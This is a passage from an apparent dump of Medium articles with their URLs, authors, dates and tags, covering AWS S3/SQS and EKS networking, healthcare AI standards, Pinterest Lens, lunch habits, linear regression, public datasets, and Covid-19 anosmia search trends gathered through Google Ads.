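With the assumed cp, k and combustion temperature, plus the measured speeds and altitudes, relations like these are enough to march through the cycle state by state and recover the temperatures, thrust and propulsive power that could have fed the pricing model as features.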
https://medium.com/analytics-vidhya/combining-data-science-and-machine-learning-with-the-aviation-industry-a-personal-journey-through-f063895fbd47
['Christopher Kuzemka']
2020-11-05 17:53:54.124000+00:00
['Data', 'Machine Learning', 'Aviation', 'Engineering', 'Python']
How to Track Unprocessed Objects in S3
Solution with SQS
Introduce an SQS queue to the setup. I'll call this queue raw-data-object-creation-event-queue. A message will be sent to this queue whenever a new object is created in the raw-data bucket. To accomplish this, set up an event notification on the raw-data bucket that listens for all object-create events. Whenever an object is created (i.e., uploaded to this bucket), a notification event is sent to the SQS queue, as in the sketch below.
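Here is a minimal boto3 sketch of that wiring — illustrative only, with a placeholder account ID and region, and assuming the bucket and queue already exist and that the queue's access policy allows S3 to send it messages (that policy is required but omitted here).
# Wire the raw-data bucket's "object created" events to the SQS queue.
import boto3

REGION = "us-east-1"                                   # placeholder region
ACCOUNT_ID = "123456789012"                            # placeholder account ID
BUCKET = "raw-data"
QUEUE_ARN = f"arn:aws:sqs:{REGION}:{ACCOUNT_ID}:raw-data-object-creation-event-queue"

s3 = boto3.client("s3", region_name=REGION)
s3.put_bucket_notification_configuration(
    Bucket=BUCKET,
    NotificationConfiguration={
        "QueueConfigurations": [
            {
                "Id": "raw-data-object-created",
                "QueueArn": QUEUE_ARN,
                "Events": ["s3:ObjectCreated:*"],      # all object create events
            }
        ]
    },
)
After this, every upload to raw-data produces a message on the queue, which a downstream consumer can poll with sqs.receive_message and delete once the corresponding object has been processed.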
https://towardsdatascience.com/how-to-track-unprocessed-objects-in-s3-5a7d3b32352d
['Dardan Xhymshiti']
2020-07-07 23:43:33.532000+00:00
['AWS', 'Programming', 'Data Sceince', 'Data Engineering']
AI in healthcare: keeping data safe and building trust
Our approach to healthcare is changing rapidly, thanks to the Internet of Things (IoT), which continues to drive the demand for services offering more intelligent analytics. As machine learning advances, there is also a broadening applicability of AI. In an increasingly digitized world of connected devices and intelligent systems, international standards play a key role in addressing the ethical, technical, safety and security aspects of the technologies we encounter in daily life. Work is already underway in a joint committee for AI established by IEC and ISO. This is the first of its kind to consider the entire AI ecosystem rather than focusing on individual technical aspects. Headed by Wael Diab, a senior director at Huawei, it draws on the breadth of application areas covered in IEC and ISO, with IT and domain experts coming from different sectors. “Connected products and services such as medical devices and automated healthcare systems must be safe and secure or no one will want to use them. Trustworthiness and related areas such as resiliency, reliability, accuracy, explainability, safety, security and privacy must be considered from a systems perspective from the get-go. Standardization will need to adopt a broad approach to cover the AI technologies and consider synergies with analytics, big data, IoT and more”, says Diab. An apple a day keeps the algorithm away From robotically-assisted surgery, virtual nursing assistants, dosage error reduction and connected devices to image analysis and clinical trials, AI technologies already play many different roles in the delivery of healthcare treatments, surgeries and services. They include improving diagnostics and helping doctors make better decisions for patients. Health insurance is a critical part of the industry and is also making use of AI. For example, some software platforms use machine learning to identify and reduce inefficiencies in the claims management process such as fraudulent inaccurate billing or waste through under-utilization of services. Others help patients choose tailored insurance coverage to reduce healthcare costs and assist employers looking for group coverage options. Digitizing healthcare The personal data of millions of patients worldwide is being gathered, stored and shared electronically in healthcare management delivery systems, clinical research and medical consultations. Doctors and researchers alone can’t leverage all this information to enhance patient care, but in a growing number of trials, algorithms have successfully mined huge numbers of patient files and medical images in a timely manner, with the result that diverse conditions are detected and diagnosed. Examples include certain cancers, the risk of heart disease and eye-related conditions. AI-powered imaging technology has learned to read thousands of anonymized complex eye scans and detected more than 50 eye conditions successfully. With an accuracy level of 94%, the algorithms matched or beat the performance of world-leading eye specialists. The argument is that this technique of sifting through big data rapidly could help reduce the time taken for patients to be seen by a consultant, and possibly save a person’s sight, but there are many hurdles to overcome before trials are fully approved. How safe is AI in the medical context? What happens if we are not in the 94% accuracy group? What if the algorithm developers get it wrong and create biases which impact patients negatively? 
While it has been acknowledged that technology has the potential for improving patient care greatly, thereby saving costs, some physicians and scientists are warning the AI community to get their ethics right first. In the healthcare context, errors could potentially harm or be fatal. If this doesn’t happen, we run the risk of introducing automated systems into the mix in a blind fashion. If errors occur, who will be accountable: machines or healthcare professionals? Recent research by Stanford University, published in the New England Journal of Medicine, raises a number of key issues which need to be addressed thoroughly before rolling out AI into healthcare. They include: Ensuring that data bias in algorithms doesn’t skew results Making sure physicians have an adequate understanding of how algorithms are developed and don’t over-rely on them Maintaining regard for clinical experience, so that the human aspect of patient care is not lost Maintaining confidentiality as the dynamics of doctor-patient relationships change Find out more by reading the article Eliminating bias from algorithms in this issue. Looking ahead Disruptive technologies like artificial intelligence pose both challenges and opportunities across all sectors. AI has already changed many aspects of daily life and will continue to have a massive impact on the lives of people and on entire societies. The important task of ironing out the many ethical questions already raised is vital to the successful adoption of these innovative technologies. IEC also contributes towards this effort as a founding member of the Open Community for Ethics in Autonomous and Intelligent Systems (OCEANIS). This community provides a space for interested organizations from around the world to share information and collaborate on initiatives and programmes, while enhancing the understanding of the role of standards in facilitating innovation. “Consensus-based international standards will play a crucial role in accelerating adoption of AI technology in industry application verticals,” says Diab. “End user societal concerns, ethical and trustworthiness considerations are being discussed and incorporated from the ground up.”
https://medium.com/e-tech/how-safe-is-ai-in-healthcare-81bd678e6f8f
[]
2019-02-06 09:29:54.296000+00:00
['Health Data', 'Health', 'Artificial Intelligence', 'Healthcare', 'Ethics']
Building Pinterest Lens: a real world visual discovery system
Andrew Zhai | Pinterest tech lead, Visual Search Recently, we announced Lens BETA, a new way to discover objects and ideas from the world around on you using your phone’s camera. Just tap the Lens icon in the Pinterest app, point it at anything and Lens will return visually similar objects, related ideas or the object in completed projects or contexts. Lens enables you to go beyond traditional uses of your phone’s camera–taking selfies or saving a scene–and turns it into a powerful discovery system. It brings the magic of Pinterest into the real world, so that anything you see can lead to a related idea on Pinterest. Here we’ll share how we built Lens and the main technical challenges we overcame. Background In 2015, we launched our first visual search experience which enables people to pinpoint parts of an image and get visually similar results. With visual search, we gained a platform to advance our technology and incrementally improve the system by optimizing for not only relevant results but engaging ones, too. Pinners have responded positively to these improvements and now generate more than 250 million unique visual searches every month. As the next evolution of visual search, we introduced real-time object detection. This not only made visual search easier to use, but we also steadily gained a corpus of objects as people saved and selected them. Since its launch, we’ve generated billions of objects in just six month’s time, and have used this data to build new technologies, such as Lens and object search. If you’re interested in a more in-depth look at how we scaled our visual search technology to billions of images and applied it across Pinterest, please take a look at our Visual Discovery at Pinterest paper that was accepted for publication at World Wide Web (WWW) conference this year. Lens architecture A single Pin can take you down a rabbit hole of related ideas, enabling you to discover high quality content from 150M people around the world. As we developed Lens, we wanted to parallel this experience, so a single real world camera image could connect you to the 100B ideas on Pinterest. Lens combines our understanding of images and objects with our discovery technologies to offer Pinners a diverse set of results. For example, if you take a picture of a blueberry, Lens doesn’t just return blueberries: it also gives you more results such as recipes for blueberry scones and smoothies, beauty ideas like detox scrubs or tips for growing your own blueberry bush. To do this, Lens’ overall architecture is separated into two logical components. The first component is our query understanding layer where we derive information regarding the given input image. Here we compute visual features such as detecting objects, computing salient colors and detecting lighting and image quality conditions. Using the visual features, we also compute semantic features such as annotations and category. The second component is our blender, as the results Lens returns come from multiple sources. We use our visual search technology to return visually similar results, object search technology to return scenes or projects with visually similar objects (more on this below) and image search which uses the derived annotations to return personalized text search results that are semantically (not visually) relevant to the input image. It’s the job of the blender to dynamically change blending ratios and result sources based on the information derived in the query understanding layer. 
For instance, image search won’t be triggered if our annotations are low confidence, and object search won’t be triggered if no relevant objects are detected. As shown above, Lens results aren’t strictly visually similar, they come from multiple sources, some of which are only semantically relevant to the input image. By giving Pinners results beyond visually similar, Lens is a new type of visual discovery tool that bridges real world camera images to the Pinterest taste graph. Building object search Sometimes you see something you love, like a cool clock or a pair of sneakers, but you don’t know how to style the shoe or how the clock would look in a room. Object Search, a core component of Lens, is a new technology we built to address these problems. With the advances of deep learning resulting in technology such as improved image representations and object detection, we can now understand images like never before. Traditionally, visual search systems have treated whole images as the unit. These systems index global image representations to return images similar holistically to the given input image. With better image representations as a result of advancements in deep learning, visual search systems have reached an unprecedented level of accuracy. However, we wanted to push the bounds of visual search technology to go beyond the whole image as the unit. By utilizing our corpus of billions of objects, combined with our real-time object detector, we can understand images on a more fine grained level. Now, for the first time, we know both the location and the semantic meaning of billions of objects in our image corpus. Object search is a visual search system that treats objects as the unit. Given an input image, we find the most visually similar objects in billions of images in a fraction of a second, map those objects to the original image and return scenes containing the similar objects. Future of visual discovery The BETA launch of Lens is really just the beginning. We’re continuing to improve our visual technologies to better understand images, as we face challenges where the image is the only available signal that we have to understand user intent. This is especially difficult in the case of real world camera images as people take photos in a variety of lighting conditions with inconsistent image quality and various orientations. We’re excited by the possibilities that objects and visual search together can bring and are continuing to explore new ways of utilizing our massive scale of objects and images to build discovery products for Pinners around the world. If you’re interested in tackling these computer vision challenges and building awesome products for Pinners, please join us! Acknowledgements: Lens is a collaborative effort at Pinterest. We’d like to thank Maesen Churchill, Jeff Donahue, Shirley Du, Jamie Favazza, Michael Feng, Naveen Gavini, Jack Hsu, Yiming Jen, Jason Jia, Eric Kim, Dmitry Kislyuk, Vishwa Patel, Albert Pereta, Steven Ramkumar, Eric Sung, Eric Tzeng, Kelei Xu, Mao Ye, Zhefei Yu, Cindy Zhang, and Zhiyuan Zhang for the collaboration on the product launch, Trevor Darrell for his advisement, Yushi (Kevin) Jing, Vanja Josifovski and Evan Sharp for their support.
https://medium.com/pinterest-engineering/building-pinterest-lens-a-real-world-visual-discovery-system-59812d8cbfbc
['Pinterest Engineering']
2017-02-22 18:35:32.806000+00:00
['Deep Learning', 'Machine Learning', 'Visual Search', 'Computer Vision', 'Engineering']
How To Hack Your Lunch
Like most people I know, lunch is my favourite meal of the day. It’s usually our first big meal of the day, and one that we’re always looking forward to, especially after an energy-draining first half of the day. Naturally I gravitated towards heavy lunches. The things in my lunch menu included creamy spaghetti, double cheeseburgers, and the occasional pad thai on the more adventurous days. I liked to keep my lunch meals variegated, but one thing struck a common thread. No matter what I had for lunch, I’d always feel lethargic and drowsy afterwards. For me, this lead to a downward spiral in post-lunch productivity, which was quite annoying. Fortunately for me, I came across an article by the New York Times not so long ago that demystified this vexing phenomenon. For one, it is a natural human tendency to feel sleepy around lunch hours. Our Circadian rhythm is engineered to undergo a dip about 7 hours into waking up. This particular process is embedded within the deep recesses of our primitive brain and is therefore very difficult to suppress. One way to mitigate this problem is by maintaining a good sleep-wake schedule and to get adequate rest during the night. The second reason heavy lunches make people feel drowsy goes down to our body’s physiological processes following meals. After a particularly heavy meal, our blood flow diverts from the brain and into the gut as our body’s parasympathetic nervous system kicks into ‘rest and digest’ mode. This diversion in blood flow is responsible for making us feel a downslope in alertness, productive output and a blunted creative tendency. This same process, in reverse, causes blood to divert from the gut and into the muscles and brain when one is exposed to a threatening stimulus, which triggers the ‘fight or flight’ response. This is carried out by the sympathetic nervous system. Your muscles go into full alert mode, putting whatever process is currently undertaking in your digestive tract on hold. The entire process is regulated by the autonomic nervous system in the brain and spinal cord, and is particularly useful when it comes to prioritising tasks in your body. Because it’s practically impossible for parasympathetic and sympathetic activities to occur simultaneously, this system acts like a sorting machine to ensure the right task is performed during the right circumstances. Unlike the fully autopilot nature of our Circadian rhythm, we at least get to control what enters our digestive system. By the mere virtue of quantity, a heavier meal will cause an increased parasympathetic response, and hence worsen an already present propensity to slump on your chair during the afternoon hours. A lighter meal, in contrast, lessens our digestive burden and therefore dampens the effects of parasympathetic overload. In return, they have the potential to improve post-prandial productivity and reduce daytime sleepiness. I experienced the benefits that lighter meals proffered first hand and found that switching my lunch regimen to a simpler, calorie-lighter diet made me less drowsy in the afternoon, and vastly improved my post-lunch energy levels. Nowadays, I opt for a small pasta with some grilled chicken shreds or a simple green pea-and-chicken salad and a glass of water. I no longer need my ration of coffee in the afternoon to keep me awake and perform my tasks. The additional boost of energy also created for me the illusion of adding more hours to the day, as it meant I was more active on more hours than I was used to having. 
These days, I’m an evangelist for light lunch regimens. Besides the occasional burgers and burritos that I dig into during my photoshoot days, I consistently stick to modest lunch portions while ensuring my macronutrient balance is still kept on check. If you’re a fan of heavy lunches like I was, and feel the subsequent lethargy take a huge toll on your afternoons, you should definitely try switching to this routine and see the changes it brings to your office table. This last piece may be a bit of a long-shot, but if you really capitalise on your enhanced productivity, perhaps you’ll impress your employers and see yourself bringing home an additional wad of cash every month. Now that’s a true hack.
https://jonathanoei.medium.com/how-to-hack-your-lunch-8ea89e588ef9
['Jonathan Adrian']
2020-02-04 03:25:13.559000+00:00
['Self Improvement', 'Business', 'Health', 'Productivity', 'Nutrition']
2020 Isn’t the Problem
When the news broke that Supreme Court Justice Ruth Bader Ginsburg had died, the instant outpouring of grief on social media was immediately followed by an outpouring of condemnation. Of a single 12-month period of time. It all amounted to: “2020 is the Worst. Year. Ever.” This year has been a steady stream of devastating wildfires, political disasters, mass whale beachings, near brushes with World War III, a global pandemic, police brutality, and a growing awareness on the part of White Americans that we didn’t actually fix racism by watching Get Out and reading half of Between the World and Me. And although no one is actually blaming 2020 for what’s happening in 2020, we are using it as a scapegoat. Declaring 2020 the worst year ever is a form of collective commiseration that gives a name to a difficult experience and makes us feel less alone. It’s a coping mechanism. But for many of us, it’s becoming less effective and more dangerous all the time. Blaming the year has become a convenient container into which we can stash every difficult truth and terrible event. It’s a way to distance ourselves from the moment. We’re choosing to believe that everything that is difficult will pass when the calendar changes. It won’t, obviously. At 12:01 a.m. on January 1, 2021 people will still be living in poverty. Racism will still threaten the lives and livelihoods of Black Americans. Our health care system will still be inadequate, and climate change will still be coming for us. All of these things will continue to be propped up by choices we make on a daily basis, and by the choices of the people we elect. The year is not the problem. We are. Which means we can do something about it. What the real problem is Every time you catch yourself falling into the 2020 trap, take a moment to look inside the container. What’s your reaction to learning that in normal times, 35 million Americans experience food insecurity, a number that has risen dramatically this year? That the wildfires in California and Oregon have released at least 83 million metric tons of carbon into the atmosphere? That Black Americans are two to three times more likely to die from Covid than White Americans? To the news that the police officers who shot and killed Breonna Taylor in her own bed will not be charged with a crime? For each of these problems, ask: Collectively, what story are we telling ourselves about it? Why the hell did this happen? What can we learn about it? What can you do about it? Turn the tic of rolling your eyes and saying “cuz 2020” into a mission to more fully understand the world. What many of us are experiencing more deeply than usual right now is instability. We’re used to making plans and having them mostly work out. We research preschools and make elaborate grocery shopping lists for project cooking. Now we’re left scrambling to figure out how the hell we’re going to take care of our children and keep our jobs, or stay healthy and not go insane from isolation, or when we can see our families who live a plane ride away. The fact that these things are unusual for us is an opportunity for reflection. For a huge, often unacknowledged, portion of the world, this volatility is normal In 2018, glaciologists from the University of Maine concluded that in the year 536 A.D. an Icelandic volcano erupted, plunging most of the Western and Northern Hemispheres into a foggy near-darkness for at least 18 months. 
Crops failed, people starved, more eruptions followed, and the Plague of Justinian wiped out something like a third of the Holy Roman Empire. Life was extremely unpleasant for about a century afterward. This revelation inspired a spate of articles ranking the worst years in history—with hot takes from historians on horrible times to be alive. While 536 has a clear edge, other generally very Eurocentric nominations include 1348, at the height of the plague in Europe, and 1492, when Christopher Columbus landed in the New World and laid the groundwork for the genocide of indigenous people and the trans-Atlantic slave trade. Years during the American Civil War and WWII were also mentioned, and as well as 1918, the beginning of the Spanish Flu pandemic that killed more than 50 million people worldwide, an almost inconceivable loss of life. Contagion. War. Natural disasters. None of these are conducive to a high quality of life. Only a masochist would actively choose to live through such events. The pandemic, though, had been like a black light shining on the hotel bedspread of modern life — we now cannot deny what we previously low-level suspected, and now that we know, we’re sure having trouble sleeping soundly. But we’re not truly that surprised. The instinct to blame it all on 2020 can be harnessed Everyone alive today is descended from humans who survived some serious shit. Some of us have clearly fared better than others — we’re still grappling with the legacy of that, and in some ways, we’re just starting. But we also have more and different tools now than in 536 or 1943 or 1968. The same technology that allows you to read a profanity-riddled pep talk from a stranger on your pocket computer when you should probably be sleeping or talking to an actual human makes it possible to connect to people around the world, research almost anything, coordinate a protest, start a letter-writing campaign — connect. When Ginsburg started law school in 1956, just over a generation of women had had the right to vote. She could make the Harvard Law Review but she couldn’t have her own credit card or mortgage. That didn’t change by saying #1956istheworst. It changed one decision, one argument, one job title at a time. No matter who wins the election, no matter if a safe and effective vaccine becomes available next week, we have a challenging road ahead. The clarity we’ve gained, the rapid change we’ve adapted to though, the realization that our individual and collective decisions matter — all of it means that we do have the power to make 2025 or 2040 the best year ever, for the most people ever.
https://forge.medium.com/2020-isnt-the-problem-f5464024b5fc
['Annaliese Griffin']
2020-09-25 05:32:57.443000+00:00
['Grief', '2020', 'Culture', 'Society', 'Future']
Linear Regression
Regression analysis is one of the most important fields in statistics and machine learning. Fig 1 — Regression There are several regression methods available. Linear regression is one of them. Regression searches for relationships among variables. In statistical modeling and in machine learning, that relationship is used to forecast the outcome of future events. Linear Regression Linear regression is probably one of the most important and widely used regression techniques. It’s among the simplest regression methods. One of its main advantages is the ease of interpreting results. Linear regression models the relationship between two variables by fitting a linear equation to observed data. One variable is considered to be an explanatory variable, and the other is considered to be a dependent variable. Fig 2 — Linear Regression relation between x and y Simple Linear Regression: Simple linear regression is the simplest case of linear regression, with a single independent variable, 𝐱 = 𝑥. Multiple Linear Regression: Multiple linear regression is a case of linear regression with more than one independent variable. Polynomial Regression: Polynomial regression is a generalized case of linear regression. It assumes a polynomial dependence between the output and the inputs and, consequently, a polynomial estimated regression function. Implementing Linear Regression in Python Fig 3 — Linear Regression in Python Python Packages for Linear Regression: The package NumPy is a fundamental Python scientific package that allows many high-performance operations on single- and multi-dimensional arrays. It also offers many mathematical routines. It is open source. The package scikit-learn is a widely used Python library for machine learning, built on top of NumPy and some other packages. It provides the means for preprocessing data, reducing dimensionality, implementing regression, classification, clustering, and more. Like NumPy, scikit-learn is also open source. Simple Linear Regression with scikit-learn: Let’s start with the simplest case, which is simple linear regression. There are five basic steps when you’re implementing linear regression: Import the packages and classes that are needed. Provide the data to work with and then make any appropriate transformations. Create a regression model and fit it with existing data. Check the results of model fitting to know whether the model is satisfactory or not. Apply the model for predictions. Let’s see an example where we predict the speed of a 10-year-old car. Import the modules needed. Fig 4 — Importing the needed modules Create the arrays that represent the values of the x and y axis: Fig 5 — values of x and y Execute a method that returns some important key values of Linear Regression: Fig 6 — A method to return key values Create a function that uses the slope and intercept values to return a new value. This new value represents where on the y-axis the corresponding x value will be placed: Fig 7 — Define a Function Run each value of the x array through the function. This will result in a new array with new values for the y-axis: Fig 8 — Run x through the function Draw the original scatter plot: Fig 9 — Scatter Plot Draw the line of linear regression: Fig 10 — Line of linear regression Display the diagram: plt.show() Fig 11 — Screenshot of the code with output.
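The steps above are only shown as screenshots (Figs 4–11), so here is a minimal sketch of what that workflow might look like in code. The car-age and speed values are placeholder data chosen for illustration, and scipy.stats.linregress is used as one way to obtain the slope and intercept the walkthrough describes — the original screenshots may use a different method or library.

```python
import matplotlib.pyplot as plt
from scipy import stats

# Placeholder data (illustrative only): car age in years vs. observed speed
x = [5, 7, 8, 7, 2, 17, 2, 9, 4, 11, 12, 9, 6]
y = [99, 86, 87, 88, 111, 86, 103, 87, 94, 78, 77, 85, 86]

# Key values of the linear regression: slope, intercept, correlation, p-value, std error
slope, intercept, r, p, std_err = stats.linregress(x, y)

def predict(age):
    """Map an x value (car age) onto the fitted line to get a predicted speed."""
    return slope * age + intercept

# Run every x value through the function to get the fitted line's y values
fitted = [predict(age) for age in x]

print(f"Predicted speed of a 10-year-old car: {predict(10):.1f}")

plt.scatter(x, y)    # original data points
plt.plot(x, fitted)  # line of linear regression
plt.xlabel("Car age (years)")
plt.ylabel("Speed")
plt.show()
```

The print statement mirrors the article’s stated goal of predicting the speed of a 10-year-old car from the fitted line.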
Conclusion: Linear regression is easy to implement, and its output coefficients are easy to interpret. When you know that the independent and dependent variables have a linear relationship, this algorithm is the best to use because of its low complexity compared to other algorithms. Linear regression is a great tool for analyzing the relationships among variables, but it isn’t recommended for most practical applications because it over-simplifies real-world problems by assuming a linear relationship among the variables.
https://medium.com/analytics-vidhya/linear-regression-4a8054576241
['Sruti Samatkar']
2020-12-13 16:33:53.560000+00:00
['Machine Learning', 'Matplotlib', 'Python', 'Linear Regression', 'Numpy']
Best Data Sources for Data Scientists
Database is the information you lose when your memory crashes — Dave Barry Introduction According to Wikipedia, a dataset or data set is a collection of data. In the open data discipline, the dataset is the unit used to measure the information released in a public open data repository. The most common formats for datasets we will find online are CSV files and spreadsheets, where the data is organized in tabular form. In the case of tabular data, a data set corresponds to one or more database tables, where every column of a table represents a particular variable, and each row corresponds to a given record of the data set in question. The data set lists values for each of the variables, such as the height and weight of an object, for each member of the data set. Each value is known as a datum. Data sets can also consist of a collection of documents or files. The data present in a dataset can be in the form of images, videos, audio files, numerical data or textual data, and it can be stored in different formats. There does not have to be only one file: the dataset can be a zip file or a folder containing multiple data tables with related data. How are datasets created? Datasets are created in multiple ways. Some are collected through surveys. Some of the data is recorded from human observation. Data can also be scraped from websites or pulled via APIs. Data can even be machine generated. It’s always important to understand how a dataset was created and where it comes from. It’s always recommended to understand the data we are working with. Where to find datasets? Some of the most commonly used dataset sources used by data scientists are listed below: 1. Kaggle Kaggle, a subsidiary of Google LLC, is an online community of data scientists and machine learning practitioners. It is a place where you can learn, practice and fine-tune your data science and analytics skills. There is a lot of open, public data, and the platform allows users to share code so that we can learn best practices within the data space. Link: https://www.kaggle.com/datasets 2. UCI Machine Learning Repository The University of California, Irvine hosts 440 data sets as a service to the ML community. These data sets are well cleaned and can be used for analytics and modelling purposes. Link: http://archive.ics.uci.edu/ml/index.php 3. Google Public datasets Google Cloud Public Datasets facilitate access to high-demand public datasets, making it easy for you to access and uncover new insights in the cloud. By analyzing these datasets hosted in BigQuery and Cloud Storage, you can seamlessly experience the full value of Google Cloud with ease. Google lists all the datasets on a page. On Google Cloud Platform (GCP), you can query the datasets using BigQuery to explore them. You will need to sign up for a GCP account. Link: cloud.google.com/bigquery/public-data/ 4. FiveThirtyEight FiveThirtyEight, sometimes rendered as 538, is a website that focuses on opinion poll analysis, politics, economics, and sports blogging. It is an interactive news and sports site that has some exceptional data visualizations. They make a lot of data openly available for public view, meaning that we can download and play with the data ourselves. Link: https://data.fivethirtyeight.com/ 5. Buzzfeed News It makes the data sets, analysis, libraries, tools, and guides used in its articles available on GitHub.
Check them out to learn from some of the best. Link: github.com/BuzzFeedNews 6. data.world data.world’s cloud-native data catalog makes it easy for everyone — not just the “data people” — to get clear, accurate, fast answers to any business question. A data catalog is a metadata management tool that companies use to inventory and organize the data within their systems. Typical benefits include improvements to data discovery, governance, and access. Link: https://data.world/ 7. Socrata Socrata hosts cleaned open source data sources spanning government, business, and education data sets. The Socrata Open Data API allows you to programmatically access a wealth of open data resources. Link: https://opendata.socrata.com/ 8. Awesome public datasets This GitHub repository hosts a library of awesome public datasets. They are sorted by category and link us straight to the hosting website. Link: github.com/awesomedata/ 9. Quandl Quandl is a marketplace for financial, economic and alternative data delivered in modern formats for today’s analysts, including Python, Excel, Matlab, and R. Some of the datasets are available for free and some can be purchased. Link: https://www.quandl.com/search 10. Data.gov It allows us to download and explore data from US government agencies. Data can range from government budgets to climate data. The data is very well documented, so it becomes easy to navigate through the resources. Link: https://www.data.gov/ 11. Academic Torrents It is a site geared around sharing the datasets from scientific papers. We can browse the data sets directly from the website and can also download them. Link: http://academictorrents.com/browse.php 12. AWS Public Data sets Amazon has a page that lists all the data sets for us to browse. We need an AWS account for this, and Amazon also gives a free access tier to new accounts. Link: https://aws.amazon.com/datasets Some other repositories Jeremy Singer-Vine Wikipedia Data Sets World Bank Data Sets Reddit — /r/datasets NASA Datasets Twitter Dataset via Twitter API Github Dataset via Github API CERN Open Data Portal Global Health Observatory Data Repository References: — Machine Learning India — 11 websites to find free, interesting datasets: interviewqs.com. — 21 Places to Find Free Datasets for Data Science Projects: www.dataquest.io. Hope you found this information useful. Thanks, Saurav Anand
https://medium.com/datadriveninvestor/best-data-sources-for-data-scientists-ae742b42b457
['Saurav Anand']
2020-10-26 10:20:30.536000+00:00
['Data Analysis', 'Artificial Intelligence', 'Computer Vision', 'Data Science', 'Machine Learning']
Amazon EKS Is Eating My IPs!
What Has Happened to the IP Allocation? Interesting! An empty two-node cluster has used up 62 IP addresses. Let’s work out why! Access config Set up our EKS cluster kubeconfig so we can use kubectl to investigate. I already have the AWS CLI configured. aws eks --region eu-west-2 update-kubeconfig --name test What is deployed? The two nodes will take two IPs from the cluster. What is deployed inside the cluster then? kubectl get pods -A There are six pods running. These are DaemonSets and Deployments that are EKS add-ons used to make the cluster function correctly. OK, cool. So, that’s a total of eight IPs we think should be in use. What about the other 54? We don’t have any other workloads in the cluster. There are no Load Balancers eating up space. There are no out-of-cluster resources like EC2, databases, VPC endpoints, etc. What sort of AWS magic is going on here? The answer lies in how EKS manages networking.
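For readers who want to see where the addresses went for themselves, here is a small sketch (not from the original article) that uses boto3 to count how many private IPs the VPC’s network interfaces are holding — the Amazon VPC CNI keeps warm pools of secondary IPs on each node’s ENIs, which is typically where the “missing” addresses sit. The VPC ID is a placeholder, and pagination is omitted for brevity.

```python
import boto3

# Placeholder: replace with the VPC that backs your EKS cluster
VPC_ID = "vpc-0123456789abcdef0"

ec2 = boto3.client("ec2", region_name="eu-west-2")

# List every network interface in the VPC (pagination omitted for brevity)
resp = ec2.describe_network_interfaces(
    Filters=[{"Name": "vpc-id", "Values": [VPC_ID]}]
)

total_ips = 0
for eni in resp["NetworkInterfaces"]:
    ips = eni["PrivateIpAddresses"]  # primary + secondary IPs held by this ENI
    total_ips += len(ips)
    print(f"{eni['NetworkInterfaceId']} ({eni.get('Description', '')}): {len(ips)} IPs")

print(f"Total private IPs held by ENIs in {VPC_ID}: {total_ips}")
```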
https://medium.com/better-programming/amazon-eks-is-eating-my-ips-e18ea057e045
['Nick Gibbon']
2020-07-19 14:23:19.567000+00:00
['Kubernetes', 'DevOps', 'AWS', 'Software Development', 'Programming']
Google Searches Reveal Covid-19 Hot Spots Before Governments Do
Google Searches Reveal Covid-19 Hot Spots Before Governments Do What Google searches reveal that governments won’t A healthcare worker talks to people in line at a United Memorial Medical Center Covid-19 testing site in Houston, Texas, June 25, 2020. Photo: Mark Felix/Getty Images Anosmia — the inability to smell — is an indicator of Covid-19 infection. According to data from 2.5 million users of the COVID Symptom Study app developed at King’s College London, two-thirds of users who tested positive for Covid-19 reported anosmia, compared to just a fifth of those who had tested negative. Meanwhile, tens of thousands of people every day are turning to Google for answers to why they suddenly can’t smell. So is there a correlation between Google searches for “I can’t smell” and positive case rates of Covid-19? Yes. Research shows that anosmia searches almost perfectly matched outbreaks in New York, New Jersey, Louisiana, and Michigan. Outside the U.S., searches peaked with outbreaks in Italy, Spain, Brazil, and the U.K. And a model built by UCL computer scientist Bill Lampos and team shows that Google searches predict Covid-19 case volumes up to 14 days ahead. Among the most predictive are searches for anosmia. So anosmia Google searches can predict outbreaks of Covid-19, but can they prevent them? That depends on how fast you could get the data. If you wanted to use Google searches to get ahead of a Covid-19 outbreak, you would need real-time data. On June 5, for the first time, Houston overtook NYC in anosmia searches. According to the CDC, patients develop symptoms from anywhere between two days to two weeks. This means you only have 14 days to get in front of the outbreak and you need to know who is Googling “I can’t smell” as the searches happen. You’d also want to know the exact number of people who are telling Google they can’t smell. Not an estimate, or an aggregate (such as you get with Google Trends). One way to get this real-time data, while also getting an accurate number of searches, is to buy the keyword “I can’t smell” in Google Ads, Google’s online advertising platform. Within Google Ads, you would write up a basic ad about anosmia (or better yet, use language from an authoritative source that provides information about anosmia). Lastly, you would choose the location you want to pull “I can’t smell” search data from. From there, your ad will serve on the Google results page of every person who is Googling “I can’t smell” in the location you told Google you wanted to target. Whether the searcher clicks your ad or not, their “impression” — an indication that a search for “I can’t smell” was conducted — will be counted in Google Ads. And the data will populate in Google Ads within an hour of someone searching. Here’s a chart of everyone located in the 250 most populated U.S. cities who has Googled “I can’t smell” since April 23 (Y-axis is the number of searches): I have this data because, since April 23, I’ve been buying the keyword “I can’t smell” in Google Ads and targeting searchers located in the top 250 U.S. cities by population. The chart is kind of hard to read. So let’s plot the same data on a map of the U.S.: You can see on the area chart that searches for “I can’t smell” were mostly from New York City and Chicago in late April and early May — two of the cities hardest hit by Covid-19 during that time. You can also see an uptick in searches from Houston and Dallas, Texas, starting in June. On June 5, for the first time, Houston overtook NYC in anosmia searches. 
(Since June 13, Houston has the highest searches among the top 250 most populated U.S. cities.) Here’s a chart comparing anosmia searches in Houston with positive case rates, during the first three weeks of June: (Anyone who has a few hours to dedicate to YouTube tutorials about Google Ads can do this, too.) I started buying anosmia keywords because I wanted to learn more about people in regions that were (then) in lockdown. But a couple of weeks into the experiment, I realized this method of data mining can also be used to learn more about regions where data is in lockdown. That is, buying keywords and serving ads to a populace can reveal which countries’ governments are lying to their citizens (or the world). Not only about Covid-19, but any topic. The government is hiding the number of deaths, this is 100 percent proven. How many [they’re hiding] is more difficult to say. [They have] completely controlled the data so we haven’t been able to access independent information on what’s really going on. — Zitto Kabwe, leader of the ACT-Wazalendo opposition party Tanzania, in West Africa, has reported just 509 cases of coronavirus since May 8, 2020. Since then, it has not reported a single case. If Google searches about anosmia correlate with, and can predict, Covid-19 infection, and if anosmia is the most common symptom of Covid-19, then we should expect anosmia searches conducted by Tanzanians to be infrequent if there really have been no new infections since May 8. Yet the same week that the Tanzanian government stopped reporting numbers, Tanzania had the second-highest Google search volume globally for anosmia. Soon there were on-the-ground reports of overflowing hospitals and night burials. Critics accused the Tanzanian government of failing to inform the public of the true extent of infections and deaths. To try to get the real story directly from Tanzania’s citizens, starting on the day the Tanzanian government went dark, I bought anosmia keywords, this time targeting ads to the entirety of Tanzania. Here is the corresponding heat map for all regions in Tanzania. On average, 93 English speakers in Tanzania made anosmia Google searches per day between May 8 and May 